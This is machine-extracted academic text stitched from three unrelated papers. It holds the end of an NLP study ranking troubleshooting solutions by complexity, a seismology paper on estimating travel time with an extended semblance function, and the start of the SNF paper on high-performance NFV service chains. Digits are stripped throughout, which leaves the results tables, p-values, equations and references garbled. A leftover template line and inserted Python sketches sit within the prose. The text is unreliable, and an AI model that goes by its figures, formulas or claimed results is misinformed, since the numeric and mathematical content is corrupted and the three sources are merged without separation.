these values lie in the range of human annotator agreement with the faq order (see sec- tion . ). in addition, we find that the models perform consistently across solution set sizes, with even higher correlations on longer sequences where our methods are likely to be more useful. posi- tion and permutation outperform random rankings and a model based solely on length features. the solution set sizes model – – > all ( ) ( ) ( ) ( ) random - . . - . . length - . - . - . - . synsem . . . . length+synsem . . . . position . . . . +length . . . . +synsem . . . . +synsem+length . . . . permutation . . . . +length . . . . +synsem . . . . +synsem+length . . . . table : kendall’s τ values on the solution reorder- ing task using -fold cross-validation and svm ranking models with different features. the results are broken down by solution set size (the number of sets per size is shown within parentheses). boldface indicates the best performing model for each set size. synsem features which measure the complexity of writing in the text are somewhat better but still in- ferior compared to position and permutation. us- ing a paired wilcoxon signed-rank test, we com- pared the τ values obtained by the different mod- els. the position and permutation performed sig- nificantly better (p < . ) compared to random, length and synsem baselines. however, τ differ- ences between position and permutation are not sta- tistically significant. with regard to feature com- binations, we observe that both models yield bet- ter performance when combined with length or synsem. the position model improves with the addition of both length and synsem, whereas the permutation model combines best with synsem features. the position+synsem+length model is significantly better than permutation (p < . ) but not permutation+synsem+length or position alone (again under the wilcoxon test). these results suggest that the solution ordering task is challenging with several factors influencing how a solution is perceived: the words used and their meaning, the writing style of the solution, and the amount of detail present in it. our data comes from the faqs produced by computer and operat- ing system manufacturers and other well-managed websites. as a result, the text in the faq solutions is of high quality. however, the same is not true model rank rank n both random . . . length . . . synsem . . . synsem+length . . . position . . . +length . . . +synsem . . . +synsem+length . . . permutation . . . +length . . . +synsem . . . +synsem+length . . . table : model accuracy at predicting the easiest solution correctly (rank ), the most difficult one (rank n), or both. bold face indicates the best performing model for each rank. for community-generated solution texts on discus- sion forums. in the latter case, we conjecture that the style of writing is likely to play a bigger role in how users perceive complexity. we thus expect that the benefit of adding length and synsem features will become stronger when we apply our models to texts from online forums. we also computed how accurately the models identify the least and most complex solutions. for solution sets of size and above (so that the task is non-trivial) we computed the number of times the rank one solution given by the models was also the easiest according to the faq gold-standard. like- wise, we also computed how often the models cor- rectly predict the most complex solution. with ran- dom rankings, the easiest and most difficult solu- tions are predicted correctly % of the time. 
get- ting both correct for a single problem happens only % of the time. the position+length model overall performs best, identifying the easiest and most diffi- cult solution % of the time. both types of solution are identified correctly % of the time. interest- ingly, the generative models are better at predicting the most difficult solution ( – %) compared to the easiest one ( – %). one reason for this could be that there are multiple easy solutions to try out but the most difficult one is probably more unique and so easier to identify. overall, we observe that the two generative mod- els perform comparably, with position having a slight lead over permutation. a key difference be- tween the models is that during training permutation observes the full ordering of solutions while posi- tion observes solutions coming from a few normal- ized position bins. also note that in the permuta- tion model, multiple solutions with the same com- plexity level are grouped together in a solution set. this property of the model is advantageous for or- dering as solutions with similar complexity should be placed adjacent to each other. at the same time, if levels and are flipped in the permutation sampled from the gmm, then any solution with complexity level will be ordered after the solution with com- plexity . the position model on the other hand, contains no special facility for grouping solutions with the same complexity. in sum, position can more flexibly assign complexity levels to individual solutions. conclusion this work contains a first proposal to organize and navigate crowd-generated troubleshooting data ac- cording to the complexity of the troubleshooting ac- tion. we showed that users perceive and agree on the complexity of alternative suggestions, and presented bayesian generative models of the troubleshooting data which can sort solutions by complexity with a performance close to human agreement on the task. our results suggest that search and summariza- tion tools for troubleshooting forum archives can be greatly improved by automatically predicting and using the complexity of the posted solutions. it should also be possible to build broad coverage au- tomated troubleshooting systems by bootstrapping from conversations in discussion forums. in the fu- ture, we plan to deploy our models in several tasks such as user authority prediction, expert interven- tion, and thread analysis. furthermore, we aim to specialize our models to include category-specific complexity levels and also explore options for per- sonalizing rankings for individual users based on their knowledge of a topic and the history of their troubleshooting actions. acknowledgements we would like to thank the editor and the anony- mous reviewers for their valuable feedback on an earlier draft of this paper. we are also thankful to members of the probabilistic models of language reading group at the university of edinburgh for their many suggestions and helpful discussions. the first author was supported by a newton international fellowship (nf ) from the royal society and the british academy. references r. barzilay and m. lapata. . modeling local coher- ence: an entity-based approach. computational lin- guistics, ( ): – . r. barzilay and l. lee. . catching the drift: proba- bilistic content models, with applications to generation and summarization. in proceedings of naacl-hlt, pages – . d. bollegala, n. okazaki, and m. ishizuka. . a bottom-up approach to sentence ordering for multi-document summarization. 
in proceedings of coling-acl, pages – . s. r. k. branavan, h. chen, l. s. zettlemoyer, and r. barzilay. . reinforcement learning for map- ping instructions to actions. in proceedings of acl- ijcnlp, pages – . s. r. k. branavan, d. silver, and r. barzilay. . learning to win by reading manuals in a monte-carlo framework. in proceedings of acl-hlt, pages – . h. chen, s. r. k. branavan, r. barzilay, and d. r. karger. a. content modeling using latent per- mutations. journal of artificial intelligence research, ( ): – . h. chen, s.r.k. branavan, r. barzilay, and d.r. karger. b. global models of document structure using latent permutations. in proceedings of naacl-hlt, pages – . j. eisenstein, j. clarke, d. goldwasser, and d. roth. . reading to learn: constructing features from semantic abstracts. in proceedings of emnlp, pages – . m. elsner, j. austerweil, and e. charniak. . a uni- fied local and global model for discourse coherence. in proceedings of naacl-hlt, pages – . m. a. fligner and j. s. verducci. . distance-based ranking models. journal of the royal statistical soci- ety, series b, pages – . d. heckerman, j. s. breese, and k. rommelse. . decision-theoretic troubleshooting. communications of the acm, ( ): – . t. joachims. . training linear svms in linear time. in proceedings of kdd, pages – . s. kim, l. cavedon, and t. baldwin. . classifying dialogue acts in one-on-one live chats. in proceedings of emnlp, pages – . m. lapata. . probabilistic text structuring: experi- ments with sentence ordering. in proceedings of acl, pages – . m. lapata. . automatic evaluation of information ordering. computational linguistics, ( ): – . m. lui and t. baldwin. . classifying user forum participants: separating the gurus from the hacks, and other tales of the internet. in proceedings of the australasian language technology workshop, pages – . n. madnani, r. passonneau, n. ayan, j. conroy, b. dorr, j. klavans, d. o’leary, and j. schlesinger. . measuring variability in sentence ordering for news summarization. in proceedings of the eleventh eu- ropean workshop on natural language generation. c. l. mallows. . non-null ranking models. i. biometrika, ( / ):pp. – . c. d. manning, m. surdeanu, j. bauer, j. finkel, s. j. bethard, and d. mcclosky. . the stanford corenlp natural language processing toolkit. in pro- ceedings of acl: system demonstrations, pages – . d. s. mcnamara, a. c. graesser, p. m. mccarthy, and z. cai. . automated evaluation of text and dis- course with coh-metrix. cambridge university press. g. a. miller. . wordnet: a lexical database for english. communication of the acm, ( ): – . s. schwarm and m. ostendorf. . reading level as- sessment using support vector machines and statistical language models. in proceedings of acl, pages – . a. vogel and d. jurafsky. . learning to follow navigational directions. in proceedings of acl, pages – . l. wang, m. lui, s. kim, j. nivre, and t. baldwin. . predicting thread discourse structure over tech- nical web forums. in proceedings of emnlp, pages – . your paper's title starts here: please center estimation algorithm for low frequency seismic motions based on extended semblance function lianming sun faculty of environmental engineering, the university of kitakyushu - hibikino, wakamatsu, kitakyushu - , japan, sun@kitakyu-u.ac.jp abstract. 
monitoring low frequency and long period ground motions is very important for earthquake detection and alarm systems, and signal processing techniques help to investigate the mechanism of deep ground motions and earthquake occurrence by detecting effective seismic information from the seismograms. in this paper a frequency domain algorithm is presented to estimate the travel time difference of seismic waves with multi-path interferences caused by the refraction effect. the spectra of the seismograms are calculated through the fast algorithm, and the multi- path parameters as well as the difference of travel time between a reference position and the seismographic stations are given by an optimization algorithm in the frequency domain. the new approach can work under conditions of refraction interference, and improve the estimation performance by using an extended semblance function. its effectiveness is demonstrated through some numerical examples, and it is shown that the proposed algorithm is applicable to the analysis of low frequency seismograms. keywords: spectral analysis, low frequency seismograms, semblance function, frequency domain. . introduction it has been revealed that the fault activities often accompany by low frequency underground motions, and long period of their accumulation may induce earthquakes. since many geological phenomena are so complicated that the mechanisms of deep ground tremors and fault slips still remain mysteries, it is difficult to construct an effective physical model for the low frequency motions. consequently, it is an essential task to monitor the low frequency seismic motions and then to give the alarm of earthquake occurrence. with the significant progress of instrumentation technology, several seismographic networks have been applied to directly monitor the seismic activities in the urgent earthquake detection and alarm systems. incorporated research institutions for seismology (iris) in america, international data center managed by comprehensive test ban treaty (ctbt), hi-net, kyoshin-net (k-net) in japan, are the typical monitoring networks [ ]. using the monitoring networks, the low slip or low-frequency earthquakes, which are considered as the characteristic mode of moment released at a deep structure of a subduction plate interface, are detected from the seismograms [ - ]. moreover, revealing their mechanisms may help to explore the intrinsic characteristics of seismic phenomena. nevertheless, the detected signals of low frequency seismograms do not have obvious p-wave and s-wave arrivals; hence it is not easy to locate the epicenters through the ordinary hypocenter determination method [ ]. some array signal processing methods were proposed to maximize a semblance function using a grid search algorithm, then to maximize the cylindrical wave index using steepest descent algorithm [ , ], or to synchronize the peak of correlation functions of the detected seismic waves in the array records [ ]. these methods were performed in time domain, and had been applied in analysis of seismic tremor in bungo channel region [ ], tokachi channel region [ ], kyoto basin [ ], and the long period ground motion of deep ground structure in yokohama city [ ]. furthermore, the large array scale is often desired in order to acquire much seismic information, whereas a fine grid is required to avoid local minimum in the existing time domain methods. as a result, they lead to considerably heavy computational load. 
on the other hand, the representation of semblance coefficient has been investigated in the frequency domain, and a frequency domain algorithm has been developed to reduce the computational complexity since some fast frequency algorithm can be utilized [ , ]. it could achieve the similar accuracy as that of the time domain; moreover, the performance of the presented frequency approach can be improved by compensating the discretization error at low sampling rate. however, when the seismic waves have refraction effects, the multi-path interferences occur and they will shift the maximum of the conventional semblance function due to the side-lobe effects of multi-path. as a result, the estimation accuracy of travel time as well as epicenter location degrades significantly; therefore the effective techniques to reduce the multi- path effects are necessary in the processing algorithms. an extended semblance function is investigated in this paper. by performing subspace decomposition of the spectral data space, the multi-path parameters can be estimated, and the optimization for the extended semblance function yields the estimation of travel time difference between a reference position and tiltmeter stations. it is seen that the multi-path effects can be handled easily in the frequency domain using the estimated parameters, and the estimation of fine travel time difference can improve the location accuracy of epicenter from the seismograms spectra in the proposed algorithm. some numerical simulations demonstrate the effectiveness of the proposed approach. . problem statement consider the seismograms observed by the tiltmeter arrays, which are composed of several stations in a tiltmeter network. if the separation distance between these stations is smaller than the wavelength of the interested low frequency seismograms, the sampling of the seismic waves holds most of the original information with little aliasing. in the seismograms of low frequency earthquake, though the records have not explicit p-wave and s-wave arrivals, they might be analyzed by array processing techniques to detect and locate the low frequency earthquakes, and to utilize the information to reveal the occurrence mechanism and activities in subduction zones. fig. tiltmeter array in monitoring network fig. illustrates a tiltmeter array in the monitoring network. it has l stations, and each station is equipped with a sensor unit at the bottom of a borehole deeper than m [ ]. assume that the separation between stations is smaller than the wavelength of seismic waves to reduce the affection of heterogeneity in crust and mantle. the conventional semblance function )( ref tc [ , ] is defined by                  k k l l ll k k l l ll tkttal tktta tc trv,smpref trv,smpref ref )( )( )( , ( ) where k is the sample number within the time window kk  , tref indicates a reference time, tsmp and tl, trv represent the sampling interval, the travel time difference of the lth station from a reference position, respectively, while the later is a function of the propagation path, wave velocity or the horizontal apparent slowness vector, which is a reciprocal vector of velocity. in [ ], the semblance function is maximized by finding an appropriate apparent slowness vector using a grid search algorithm, where the grid is set as small spacing in latitude and longitude, and the estimate of epicenter is determined from the estimated vector of apparent slowness. 
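for concreteness, the conventional semblance coefficient defined above can be sketched in a few lines of python/numpy. the candidate delays, the choice of reference time index, and the assumption that delays are small relative to the record length are illustrative simplifications; the methods cited above additionally map each candidate slowness vector to per-station delays through the array geometry.

```python
import numpy as np

def semblance(traces, delays, k_window):
    """Time-domain semblance coefficient for L station records.

    traces   : (L, N) array, one seismogram per station
    delays   : length-L integer array of candidate travel-time differences,
               in samples, relative to the reference position
    k_window : half-width (in samples) of the analysis window around t_ref
    Returns a value in [0, 1]; values near 1 indicate coherent alignment.
    Assumes the delays are small compared with the record length N.
    """
    L, N = traces.shape
    center = N // 2  # reference time index (illustrative choice)

    num = 0.0
    den = 0.0
    for k in range(-k_window, k_window + 1):
        samples = np.array([traces[l, center + k - delays[l]] for l in range(L)])
        num += samples.sum() ** 2
        den += (samples ** 2).sum()
    return num / (L * den) if den > 0 else 0.0

def best_delays(traces, candidate_delay_sets, k_window):
    """Grid search: each candidate delay set corresponds to one trial
    apparent-slowness vector (the geometry mapping is not shown)."""
    scores = [semblance(traces, np.asarray(d), k_window) for d in candidate_delay_sets]
    best = int(np.argmax(scores))
    return candidate_delay_sets[best], scores[best]
```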
when the grid search algorithm in the time domain is used simultaneously for multiple arrays, the estimation efficiency will be very poor especially for smaller spacing in both latitude and longitude. an efficient frequency domain approach has been considered for the estimation of travel time difference by using the seismic spectra with low computational load [ ]. define the relation function of the observed signal at stations l and l as follows: .)()(),( ,    k k llllllll tnkttatnktta k nnr smpsmprefsmpsmpref ( ) then the numerator and denominator of the semblance function can be rewritten as , , , )( ,, , ,, ,                                                 l l ll ll l l l ll ll ll t t t t rl t t t t r l tc smp trv smp trv smp trv smp trv ref ( ) where [x] is the nearest integer to the real number x. it is easily seen that maximizing the semblance function ( ) is equivalent to maximizing the second term of ( ). on the other hand, let the fourier transform of the observed record be defined by ,)()(     k k ik l i l ff ekttaea smpref  ( ) where ff f /  is the f th frequency grid, fff  . then the inverse fourier transform of )()( * ff i l i l eaea   can be given by ).,()()()( , * , kkkreeaea kf kx ll f ff iki l i lll fff      ( ) therefore, the semblance function can be approximated by            l l ll l l l ll llll xl kkx l tc ref , , , )( , ( ) then )( ref tc in ( ) reaches a maximum if the values kl , l = kl - kl maximize the following function     ,,maxarg,, , ,, , , , ,         l l l ll llll kk ll kkxkk ll  ( ) and smptrvtrv tktt llll ,,,  . if the integer f is the power of , both )( fi l ea  and   llll kkx , , can be computed through the algorithm of fast fourier transform, therefore the algorithm can be performed efficiently [ ]. furthermore, a genetic algorithm based approach can be used to give the estimation of epicenter location [ ]. . extended semblance function assume that the observed signal at tiltmeter station l can be approximated as follows:  )()()( ,,,, smpref smpref smpref lllll kttagkttagktta  , ( ) where gl, , gl, and ,, , ll  are the gain and delay time of the direct wave, delayed wave, respectively. )( smpref ktta  is the source wave comes from the epicenter. then the spectral representation of )( smpref ktta l  can be given by ).()( )()()( , , ff fmlfff ii l i m m i ml k k ik l i l eaeg eaegekttaea            smpref ( ) it is seen that ,trv, ll t  if no delay waves in the observed signal )( smpref ktta l  . let the extended semblance function be given by                             l l f ff i l i l i l i l l l l ll f ff i l i l i l i l f f f f f f f f eg ea eg ea l eg ea eg ea l tc * * * * ref )( )( )( )( )( )( )( )( )(         , ( ) then the parameters of gl,m and ml , might be estimated by optimizing the semblance function in ( ). nevertheless, the direct optimization of ( ) is difficult since it is a severe nonlinear problem, and the optimization may converge to local solution easily. in order to improve the processing efficiency, a simplified semblance function will be used in the estimation algorithm. . estimation algorithm without loss of the generality, let the reference position be the tiltmeter station , and fix g , as g , = , then for l = , . . ., l, the travel time difference tl,trv of direct waves from the reference position is trvl, ,,   lt . 
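the frequency-domain shortcut described above amounts to computing the pairwise cross-correlations through the fft and picking the lags that maximise their sum. the sketch below shows the core step for a single station against the reference; the zero-padding length, the sign convention, and the function name coarse_delay_fft are our own choices, and the full algorithm further refines this coarse estimate with the (extended) semblance criterion.

```python
import numpy as np

def coarse_delay_fft(ref_trace, trace, fs):
    """Coarse travel-time difference of one station relative to the reference,
    taken from the peak of the FFT-based cross-correlation (cf. the relations above).

    ref_trace, trace : equal-length 1-D arrays (windowed seismograms)
    fs               : sampling rate in Hz
    Returns the delay in seconds, positive if `trace` lags the reference.
    """
    n = len(ref_trace)
    nfft = 1 << (2 * n - 1).bit_length()       # zero-pad so the correlation is linear
    A_ref = np.fft.rfft(ref_trace, nfft)
    A_l = np.fft.rfft(trace, nfft)

    cross = np.fft.irfft(A_l * np.conj(A_ref), nfft)  # cross-correlation via inverse FFT
    lags = np.arange(nfft)
    lags[lags > nfft // 2] -= nfft                    # map indices to signed lags
    k_hat = int(lags[int(np.argmax(cross))])
    return k_hat / fs
```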
let the sub- semblance function )( , ref tc l be given by     . )()()()()()()()( )()()()()()()()( )( **** **** ,           f ff ii l i l ii l iii l f ff i l ii l iii l ii l l ffffffff ffffffff egeaeaegegeaeaeg egeaeaegegeaeaeg tc ref   ( ) commonly only a few frequency components are contained in the seismograms, hence the optimization of ( ) will be an ill-conditioned problem, and is influenced by noise easily. instead the direct optimization, the optimization will be performed in the following procedures. a.initial values.set the initial values gl, = , gl, = gl, =…= , then the initial estimates of trvl, ,,   lt can be obtained by ( ). b.estimation of multi-path parameters.these parameters will be estimated by a subspace decomposition technique in a grid research way. construct a spectral data matrix ),,,,,( ,,,,  lll kkkk containing both the main lobe and the side-lobe of seismic waves as follows: , )()( )()( )()( )()( ),,,,,( , , )( )( )( )( )()( , , , , trv, , trv, , trv, , trv, , trv, , trv, , t l l t itkiitki itkiitki i l tkii l tki i l i l lll fllffllf fllffllf flfflf ff eaeeae eaeeae eaeeae eaea kkkk                                     Ω Ω Ω            ( ) where tl,trv is the estimate given in step a,  is a grid interval. in order to reduce the influence of noise, the subspace decomposition of ( ) is performed as follows: ),,,,,(),,,,,( ,,,,,,,,  lllll h l h lll kkkkkkkk ΩΩvsu  , ( ) then the noise subspace vectors  v , which are the last column vectors in vl, can be obtained. denote ,v and ,v as the parts corresponding to ,l Ω , ,l Ω , respectively, where , v is associated with the parameters g ,m, whereas ,v is associated with the parameters gl,m. therefore the optimal values of gl,m , kl,m will be given by   .)(maxarg ,,,,, , ,,,,,,,, ,,,,,,,, ,, ,,,, , ,,        vΩΩvvΩΩvvΩΩv vΩΩvvΩΩv l h l h l h l h l h l h l h l h l h l h kk mlm ml kkgg g    ( ) the first term in ( ) indicates an approximation of the extended semblance function )( , ref tc l , while the second one is the criterion for multi-path parameter estimation. on the other hand, instead of the extended semblance function, an appropriate pre-filter can be utilized to compensate the multi-path effect by using the estimates of gl,m and kl,m [ ]. c.optimization of extended semblance function.substitute the estimates of gl,m and kl,m into the extended semblance function )( , ref tc l , and leave trvl, t as a variable, then the optimization of )( , ref tc l with respect to trvl, t yields fine estimate of the difference of travel time between the tiltmeter stations and reference position. d.estimation of epicenter location.using the estimates of difference travel time trvl, t , the epicenter location can be estimated by the methods given in [ , ]. moreover, in order to decrease the influence of noise, the value of semblance function )( , ref tc l can be used as weight function for trvl, t in the epicenter estimation. . numerical examples some simulation examples are considered to investigate the effectiveness of the proposed algorithm. the main frequency components are within . ~ . hz, and the components beyond the frequency band, the interferences caused by refraction or reflection are considered as noise. the seismic wave travels at velocity of km/s. stations whose separation are within . km~ . 
km are utilized in the tiltmeter array, and simulation runs be performed in the example. the true locations of epicenter in runs are randomly distributed as normal distribution as n( . ', ( . ') ) west in longitude, n( . ', ( . ') south in latitude, as uniform distribution as ~ km in the depth from the reference station . there is a refraction wave in the layer depth of km. the seismograms are sampled at the sampling rate hz, and the records in a time window of s are used for the data analysis. the simulations are performed under the signal to noise ratio of . , , db, respectively. the estimation errors of difference travel time and epicenter location are summarized in tab. and . for comparison, the results of conventional methods without compensation of multi-path effects are also given in the tables. it is seen that the proposed algorithm can reduce the estimation errors under the situations with multi-path effects, and it works well especially if a great deal of data can be used in estimation even if the signal to noise ration is low. tab. standard deviation of difference travel time estimation in simulation runs method difference travel time(  s) . db db db conventional algorithm . . . proposed algorithm . . . tab. standard deviation of epicenter location in simulation runs method epicenter location (  %) . db db db conventional algorithm . . . proposed algorithm . . . . conclusions the extended semblance function based algorithm has been proposed to estimate the difference of travel time and the epicenter location for low frequency seismograms. it has been shown that the proposed algorithm can perform optimization in the frequency domain, where the side-lobe can be treated by the shift property of signal spectra. compared with the conventional methods, the proposed algorithm improves the estimation accuracy of the difference travel time when the seismograms have multi-path effects; therefore it can help to locate the epicenter more precisely. the approach to the case with several epicenters, and the effectiveness validation of the real seismograms will be investigated in the future work. references [ ] m. kikuchi. realtime seismology, university of tokyo press, [ ] k. obara. “nonvolcanic deep tremor associated with subduction in southwest japan,” science, vol. , pp. - , . [ ] h. hirose and k. obara.“repeating short- and long-term slow slip events with deep tremor activity around the bungo channel regions, southwest japan,”earth planets space, vol. , pp. - , . [ ] committee for earthquake prediction studies, seismological society of japan.the science of earthquake prediction, university of tokyo process, . [ ] y. asano, k. obara and y. ito. “spatiotemporal distribution of very-low frequency earthquakes in tokachi-oki near the junction of the kuril and japan trenches revealed by using array signal processing, ” earth planets space, vol. , pp. - , . [ ] n.s. neidell and m.t.taner.“semblance and other coherency measures for multichannel,”geophysics,vol. , pp. - , . [ ] c. shirakawa and t. iwata.“ground motion characteristics of south-east kyoto basin site using three dimensional small aperture seismic array at uji campus, kyoto university,”annuals of disaster prevention research institute, kyoto university, no. (b), pp. - , . [ ] h. miura and s. midorikawa.“effects of -d deep underground structure on characteristics of rather long-period ground motion,” earthquake, no. , pp. - , . [ ] w. zhu, l. sun and x. 
zhu.“analysis of low frequency seismograms in frequency domain,”icic express letters, vol. , no. (a), pp. - , . [ ] l. sun and a.sano.“system identification and error analysis in frequency domain,”international journal of innovative computing, information and control, vol. , no. , pp. - , . [ ] w. zhu, l. sun and x. zhu.“epicenter location via genetic algorithm for low frequency seismograms, icic express letters, vol. (to appear) [ ] g. jacovitti and g. scarano. “discrete time techniques for time delay estimation,” ieee trans. signal processing, vol. , no. , pp. - , . submitted september accepted october published november corresponding author georgios p. katsikas, katsikas@kth.se academic editor pamela zave additional information and declarations can be found on page doi . /peerj-cs. copyright katsikas et al. distributed under creative commons cc-by . open access snf: synthesizing high performance nfv service chains georgios p. katsikas , marcel enguehard , , maciej kuźniar , gerald q. maguire jr and dejan kostić department of communication systems (cos), school of information and communication technology (ict), kth royal institute of technology, kista, stockholm, sweden network and computer science department (infres), telecom paristech, paris, france paris innovation and research laboratory (pirl), cisco systems, paris, france abstract in this paper we introduce snf, a framework that synthesizes (s) network function (nf) service chains by eliminating redundant i/o and repeated elements, while consolidating stateful cross layer packet operations across the chain. snf uses graph composition and set theory to determine traffic classes handled by a service chain composed of multiple elements. it then synthesizes each traffic class using a minimal set of new elements that apply single-read-single-write and early-discard operations. our snf prototype takes a baseline state of the art network functions virtualization (nfv) framework to the level of performance required for practical nfv service deployments. software-based snf realizes long (up to nfs) and stateful service chains that achieve line-rate gbps throughput (up to . x greater than the baseline nfv framework). hardware-assisted snf, using a commodity openflow switch, shows that our approach scales at gbps for internet service provider-level nfv deployments. subjects computer networks and communications keywords nfv, service chains, synthesis, single-read-single-write, line-rate, gbps introduction middleboxes hold a prominent position in today’s networks as they substantially enrich the dataplane’s functionality (sherry et al., ; gember-jacobson et al., ). however, to manage traditional middleboxes requires costly capital and operational expenditures; hence, network operators are adopting network functions virtualization (nfv) (european telecommunications standards institute, ). among the first challenges in nfv was to scale software-based packet processing by exploiting the characteristics of modern hardware architectures. to do so, several works leveraged parallelism first across multiple servers and then across multiple cores, sockets, memory controllers, and graphical processing units (gpus) (han et al., ; kim et al., b) within a single server (dobrescu et al., ; dobrescu et al., ). attaining hardware-based forwarding performance was difficult to achieve, even with highly-scalable software-based packet processing frameworks. the main reason was the poor i/o performance of these frameworks. 
thus, the focus of both industry and academia shifted to customizing operating systems (oss) to achieve high-speed network i/o, for example by using batch packet processing (kim et al.), static memory pre-allocation, and zero-copy data transfers (rizzo; dpdk). modern applications require combinations of network functions (nfs), also known as service chains, to satisfy their services' quality requirements (quinn & nadeau). with all the above advancements in place, nfv instances achieved line-rate forwarding at tens of millions of packets per second (mpps); however, performance issues remain when several nfs are chained together. state-of-the-art frameworks such as clickos (martins et al.) and netvm (hwang, ramakrishnan & wood) have reported substantial throughput degradation when realizing chains of interconnected, monolithic nfs. the first consolidation attempts targeted the application layer (e.g., deep packet inspection) (bremler-barr et al.) and the session layer (e.g., http) (sekar et al.). however, a lot of redundancy still resides lower in the network stack. anderson et al. describe how xomb builds programmable and extensible open middleboxes specialized for request/response-based communication. in addition, slick (anwer et al.) introduced a programming language to deploy network-wide service chains, driven by a controller. slick avoids redundant operations and shares common elements; however, its decentralized consolidation still realizes a chain of nfs as distributed processes. most recently, e2 (palkar et al.) showed how to schedule nfs across a cluster of machines for high throughput. also, openbox (bremler-barr, harchol & hay) introduced an algorithm that merges processing graphs from different nfs into a single processing graph; we provide a detailed comparison of our work with both e2 and openbox in the 'related work' section.
the idea in snf is simple: create spatial correlation to execute service chains as possible to the speed of the cpu cores operating on the fastest, i.e., l , cache of modern multi-core machines. snf leverages the ever-continuing increases in numbers of cores of modern multi-core processor architectures and the recent advances in user-space networking. snf automatically derives traffic classes of packets that are traversing a provider-specified service chain of nfs. packets in a traffic class are all processed the same way. additionally, snf handles stateful nfs. using its understanding of each of the per-traffic class chains, snf then synthesizes equivalent, high-performance nfs for each of the traffic classes. in a straightforward snf deployment, one cpu core processes one traffic class. in practice, snf allocates multiple cpu cores to execute different sets of traffic classes in isolation (see the ‘snf overview’ section). katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. snf’s optimization process performs the following tasks: (i) consolidates all the read operations of a traffic class into one element, (ii) early-discards those traffic classes that lead to packet drops, and (iii) associates each traffic class with a write-once element. moreover, snf shares elements among nfs to avoid unnecessary overhead, and compresses the number and length of the chain’s traffic classes. finally, snf scales with an increasing number of nfs and traffic classes. this architecture shifts the challenge to packet classification, as one component of snf has to classify an incoming packet into one of the pre-determined traffic classes, and pass it to the synthesized function. we extended popular, open-source software to improve the performance of software-only packet classification. in addition, we employed an openflow (mckeown et al., ) switch as a packet classifier to demonstrate the performance possible by a sufficiently powerful programmable network interface (commonly abbreviated as nic). the benefits of snf for network operators are multifold: (i) snf dramatically increases the throughput of long nf chains, while achieving low latency, and (ii) it does so while preserving the functionality of the original service chains. we implemented the snf design principles into an appropriately modified version of the click (kohler et al., ) framework. to demonstrate snf’s performance, we compare it against the fastest click variant to date, called fastclick (barbette, soldani & mathy, ). to show snf’s generality we tested its performance in three uses cases: (i) a chain of software routers, (ii) nested network address and port translators (napts) (liu et al., ), and (iii) access control lists (acls) using actual nf configurations taken from internet service providers (isps) (taylor & turner, ). our evaluation shows that software-based snf achieves gbps, even with small ethernet frames, across long (up to nfs), stateful chains. in particular, it achieves up to . x more throughput and x lower latency with – . x lower latency variance than the original nf chains implemented with fastclick, when running on the same hardware. offloading traffic classification to a commodity openflow switch allows snf to realize re- alistic isp-level chains at gbps (for most of the frame sizes), while bounding the median chain latency to below µs (measured from separate sending and receiving machines). 
in the rest of this paper, we provide an overview of snf in the ‘snf overview’ section. we introduce our synthesis approach in the ‘snf architecture’ section and a motivating example in the ‘a motivating use case’ section. implementation details and performance evaluation are presented in the ‘implementation’ section and in the ‘performance evaluation’ section, respectively. we discuss verification aspects in the ‘verification’ section. the ‘limitations’ section discusses the limitations of this work and the ‘related work’ section positions our work with respect to the state of the art. finally, the ‘conclusion’ section concludes this paper. snf overview the idea of synthesizing network service components consorts with a powerful property: data correlation in network traffic. in a network system, this property is mapped to spatial locality with respect to the receiver’s caches. snf aggregates parts of the flow space into katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. core multi-threaded snf classifier with chain-level traffic class units (tcus) snf rewriter-core snf rewriter-core snf rewriter-core snf rewriter-core k traffic domain symmetric receive-side scaling bi-directional flow traffic domain ... dedicated cores per nic for i/o core snf synthesizer with stateful per core rewriters figure an overview of snf running on a machine with k cpu cores and nics. dedicated cpu cores per nic deliver bi-directional flows to packet processing cpu cores via symmetric rss. processing cores concurrently classify traffic and access individual, stateful snf rewriters to modify the traffic. traffic class units (tcus) (the detailed definition is given in the ‘abstract service chain representation’ section), which are then mapped to sets of (re)write operations. by carefully setting the cpu affinity of each tcu, this aggregation enforces a high degree of correlation in the traffic (seen as logical units of data) resulting in high cache hit rates. our overarching goal is to design a system that efficiently utilizes per core and across cores cache hierarchies. with this in mind, we design snf based on fig. . in the example shown in this figure, we assume that a network operator wants to deploy a service chain between network domains and . for simplicity we also assume that there is one nic per domain. a set of dedicated cores (i.e., core and for the nics facing domains and , respectively) attempts to read and write frames at line-rate. once a set of frames is received, say by core , it is transferred to the available processing cores (i.e., cores to k). frame transfers can occur at high speed via a shared cache, which has substantial capacity in modern hardware architectures. once a processing core acquires a frame, it executes snf as shown in fig. . first the core classifies the frame (green rectangles in fig. ) in one of the chain’s tcus and then applies the required synthesized modifications (blue rounded-rectangle in fig. ) that correspond to this tcus out of the chain. both classification and modification processes are highly parallelized as different cores can simultaneously process frames that belong to different tcus. we detail both processes in the ‘synthesis steps’ section. the key point of fig. is that a core’s pipeline shares nothing with any other pipeline. 
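the shared-nothing pipeline just described can be pictured as follows: each processing core owns its own classifier and its own stateful rewriters, classifies a frame into one of the chain's tcus, applies the synthesized modifications, or discards the frame early if no tcu matches. the python sketch below is a deliberately simplified model of this logic (dictionary-based headers, lambda predicates) and is not the click-based implementation.

```python
class CoreWorker:
    """Toy model of one SNF processing core: it owns its own classifier rules
    and its own state table, so nothing is shared with other cores."""

    def __init__(self, tcu_rules):
        # tcu_rules: ordered list of (match, rewrite) pairs; `match` takes a
        # parsed header (dict) and returns True/False, `rewrite` returns the
        # modified header and may consult/update the per-core state table.
        self.tcu_rules = tcu_rules
        self.flow_state = {}  # per-core state (e.g., NAPT mappings)

    def process(self, pkt):
        for match, rewrite in self.tcu_rules:
            if match(pkt):
                return rewrite(pkt, self.flow_state)
        return None  # no TCU matched: early discard

# example: a single TCU that forwards TCP traffic towards 10.0.0.0/16 after
# rewriting the destination MAC address; everything else is dropped early
rules = [
    (lambda p: p["proto"] == "tcp" and p["ip_dst"].startswith("10.0."),
     lambda p, state: {**p, "eth_dst": "aa:bb:cc:dd:ee:ff"}),
]
worker = CoreWorker(rules)
print(worker.process({"proto": "tcp", "ip_dst": "10.0.3.4", "eth_dst": "00:00:00:00:00:00"}))
print(worker.process({"proto": "udp", "ip_dst": "8.8.8.8", "eth_dst": "00:00:00:00:00:00"}))  # None
```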
